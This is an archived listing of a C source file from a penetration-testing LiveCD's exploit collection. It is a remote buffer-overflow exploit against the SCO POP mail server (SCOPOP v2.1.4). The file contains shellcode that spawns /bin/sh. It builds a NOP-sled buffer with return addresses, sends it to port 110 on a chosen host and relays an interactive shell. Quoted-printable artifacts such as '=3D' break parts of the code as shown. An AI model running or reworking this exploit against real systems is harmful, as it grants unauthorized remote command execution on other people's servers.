home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / openserver / scopop.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  94 lines

---

1. /*
2.  *        Remote pop exploit for SCO systems.
3.  *        by glitch of litecrew.
4.  *        Ripped  from Miroslaw Grzybek's code.
5.  */
6.  
7. #include        <stdio.h>
8. #include        <stdlib.h>
9. #include        <sys/time.h>
10. #include        <sys/types.h>
11. #include        <unistd.h>
12. #include        <sys/socket.h>
13. #include        <netinet/in.h>=20
14. #include        <netdb.h>
15. #include        <sys/errno.h>
16.  
17. char *shell=3D
18. "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
19. "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
20. "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
21. "\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
22. "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
23. "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
24.  
25. #define ADDR 0x80474b4
26. #define OFFSET 0
27. #define BUFLEN 1200
28.  
29. char    buf[BUFLEN];
30. int     offset=3DOFFSET;
31. int     nbytes;
32. int     sock;
33. struct  sockaddr_in sa;
34. struct  hostent *hp;
35. short a;
36. void main (int argc, char *argv[]) {
37.         int i;
38.         if(argc<2) {
39.                 printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
40.                 printf("Default offset is 0. It works against SCOPOP =
41. v2.1.4-R3\n");
42.                 exit(0);
43.         }
44.         if(argc>2)
45.                 offset=3Datoi(argv[2]);
46.         memset(buf,0x90,BUFLEN);
47.         memcpy(buf+800,shell,strlen(shell));
48.         for(i=3D901;i<BUFLEN-4;i+=3D4)
49.                 *(int *)&buf[i]=3DADDR+offset;
50.         buf[BUFLEN]=3D'\n';
51.         if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) {
52.                 perror("gethostbyname()");
53.                 exit(0);
54.         }
55.         if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
56.                 perror("socket()");
57.                 exit(0);
58.         }
59.         sa.sin_family=3DAF_INET;
60.         sa.sin_port=3Dhtons(110);
61.         memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
62.         if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) {
63.                 perror("connect()");
64.                 exit(0);
65.         }
66.         printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); =
67. fflush(stdout);
68.         write(sock,buf,strlen(buf));
69.         while(1) {
70.                 fd_set input;
71.  
72.                 FD_SET(0,&input);
73.                 FD_SET(sock,&input);
74.                 if((select(sock+1,&input,NULL,NULL,NULL))<0) {
75.                         if(errno=3D=3DEINTR) continue;
76.                         printf("CONNECTION CLOSED...\n"); =
77. fflush(stdout);
78.                         exit(1);
79.                 }
80.                 if(FD_ISSET(sock,&input)) {
81.                         nbytes=3Dread(sock,buf,BUFLEN);
82.                         for(i=3D0;i<nbytes;i++) {
83.                              *(char *)&a=3Dbuf[i];
84.                              if ((a!=3D10)&&((a >126) || (a<32)) ){
85.                              buf[i]=3D' ';
86.                            }
87.                          }
88.                         write(1,buf,nbytes);
89.                 }
90.                 if(FD_ISSET(0,&input))
91.                         write(sock,buf,read(0,buf,BUFLEN));
92.         }
93. }
94.